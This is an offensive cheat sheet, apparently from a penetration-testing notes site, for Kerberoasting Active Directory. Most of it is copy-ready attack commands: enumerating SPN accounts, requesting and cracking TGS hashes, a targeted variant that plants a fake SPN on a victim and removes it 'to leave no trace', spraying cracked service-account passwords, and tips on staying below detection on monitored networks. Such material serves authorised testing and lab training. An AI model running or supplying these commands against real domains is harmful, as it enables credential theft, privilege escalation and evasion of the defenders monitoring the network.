Kerberoasting

Sections Kerberoasting

Request TGS for any user account that has an SPN, get back a hash encrypted with the user’s NT key. Crack offline.

DC=10.10.11.50
DOMAIN=corp.local
USER='svc_user'
PASS='Password1'

i. Find Kerberoastable users

BloodHound query, see BloodHound :

MATCH (u:User {hasspn: true, enabled: true}) RETURN u.name, u.serviceprincipalnames

nxc shortcut, dump SPN candidates:

nxc ldap $DC -u $USER -p $PASS --get-sid       ## helps disambiguate
nxc ldap $DC -u $USER -p $PASS --kerberoasting roast.txt

bloodyAD LDAP filter:

bloodyAD -d $DOMAIN -u $USER -p $PASS --host $DC get search \
  --filter '(&(objectClass=user)(servicePrincipalName=*)(!(samAccountName=krbtgt)))' \
  --attr samaccountname,servicePrincipalName,memberOf

ii. Roast every roastable account, one shot

nxc, fastest and least painful:

nxc ldap $DC -u $USER -p $PASS --kerberoasting roast.txt
## With NTLM hash:
nxc ldap $DC -u $USER -H $NTHASH --kerberoasting roast.txt

impacket-GetUserSPNs, the classic:

impacket-GetUserSPNs -request -dc-ip $DC "$DOMAIN/$USER:$PASS" -outputfile roast.txt
## With hash:
impacket-GetUserSPNs -request -dc-ip $DC -hashes :$NTHASH "$DOMAIN/$USER" -outputfile roast.txt
## With Kerberos (KRB5CCNAME set):
impacket-GetUserSPNs -k -no-pass -request -dc-ip $DC "$DOMAIN/$USER" -outputfile roast.txt
## Format the output as hashcat input explicitly (default is already hashcat):
impacket-GetUserSPNs -request -dc-ip $DC "$DOMAIN/$USER:$PASS" -outputfile roast.txt -no-preauth-pre-validation

Rubeus (from a Windows foothold):

Rubeus.exe kerberoast /outfile:roast.txt
Rubeus.exe kerberoast /user:svc_account /outfile:roast.txt
Rubeus.exe kerberoast /rc4opsec /outfile:roast.txt              ## only roast accounts that still support RC4 (avoids AES failures)
Rubeus.exe kerberoast /aes /outfile:roast.txt                   ## roast AES instead (-m 19700 in hashcat)

iii. Targeted Kerberoast (write-SPN-then-roast)

When you have GenericWrite or WriteProperty on servicePrincipalName over a user who doesn’t have an SPN, set one temporarily, roast, then remove. nxc and targetedKerberoast.py automate this:

nxc targeted mode (sets cifs/<sam> SPN, roasts, removes):

nxc ldap $DC -u $USER -p $PASS --kerberoasting roast.txt --targeted-kerberoast victim1 victim2
## From a file list:
nxc ldap $DC -u $USER -p $PASS --kerberoasting roast.txt --targeted-kerberoast victims.list

targetedKerberoast.py (standalone, predates nxc’s built-in):

targetedKerberoast.py -d $DOMAIN -u $USER -p $PASS --dc-ip $DC
targetedKerberoast.py -d $DOMAIN -u $USER -H $NTHASH --dc-ip $DC --request-user victim1

Manual with bloodyAD when you want to control timing or stack with other ACL abuse:

## 1. Set a fake SPN on the victim
bloodyAD -d $DOMAIN -u $USER -p $PASS --host $DC set object victim --raw \
  -v servicePrincipalName=fake/svc.$DOMAIN

## 2. Roast it (you can target a specific user too)
impacket-GetUserSPNs -request -request-user victim -dc-ip $DC "$DOMAIN/$USER:$PASS" -outputfile roast.txt

## 3. Remove the SPN to leave no trace
bloodyAD -d $DOMAIN -u $USER -p $PASS --host $DC set object victim servicePrincipalName
When to choose manual

If you have GenericWrite over many users and want to chain attacks, manual gives you control. If you just want hashes fast, use nxc --targeted-kerberoast.

iv. Kerberoast from an ASREP-roastable account (no creds)

When you found an AS-REP roastable user with no creds, you can still use that account to authenticate to LDAP and pull kerberoastable hashes. nxc has this built in:

nxc ldap $DC -u asrep_user -p '' --no-preauth-targets kerberoastable.list --kerberoasting roast.txt

--no-preauth-targets accepts a file listing kerberoastable users (or a single user). nxc requests TGS using the no-preauth user as the auth client.

v. Cracking the hashes

Format check, the hash should look like $krb5tgs$23$*USERNAME$DOMAIN$SPN*$...:

head -1 roast.txt

Hashcat:

## RC4 (etype 23), the common one
hashcat -m 13100 roast.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule
hashcat -m 13100 roast.txt rockyou.txt -r OneRuleToRuleThemAll.rule
## AES (etype 17/18)
hashcat -m 19600 roast.txt rockyou.txt       ## AES128 etype 17
hashcat -m 19700 roast.txt rockyou.txt       ## AES256 etype 18
AES is slow

AES TGS hashes are 50,000x slower than RC4. Most modern environments force AES. Use targeted wordlists and rules, not brute force. If you have GPU capacity, see Password Cracking for cloud cracking options.

vi. After cracking

The cracked password is for the SERVICE ACCOUNT. Spray it:

nxc smb $DC -u svc_account -p 'Cracked123!' --shares
nxc ldap $DC -u svc_account -p 'Cracked123!' --users

Service accounts often have:

  • Admin on the host they run on
  • Membership in groups with weak ACLs
  • Reused across multiple service accounts

Always re-collect BloodHound after compromising a new account.

vii. OpSec notes

  • Kerberoasting requests TGS, which logs as Event 4769 on the DC for each SPN
  • Rubeus /rc4opsec filters out accounts where RC4 is disabled (no error noise)
  • nxc --kerberoasting logs each TGS request, expect to be detected on monitored networks
  • AS-REP-roastable account kerberoasting (section iv) still generates 4769 but from the no-preauth user, which is a less common pattern

For real engagements, kerberoast in small batches and let it look like normal Kerberos traffic. On HTB/labs, fire all at once.

viii. Defense bypass: when you can’t roast directly

If standard --kerberoasting returns nothing useful and --targeted-kerberoast isn’t applicable, check:

  • Resource-Based Constrained Delegation path -> Delegation (no roasting needed, you take the account directly)
  • gMSA accounts -> Credential Dumping , pull the password if you have access
  • DCSync rights -> DCSync , pull every NTLM hash instead of cracking TGS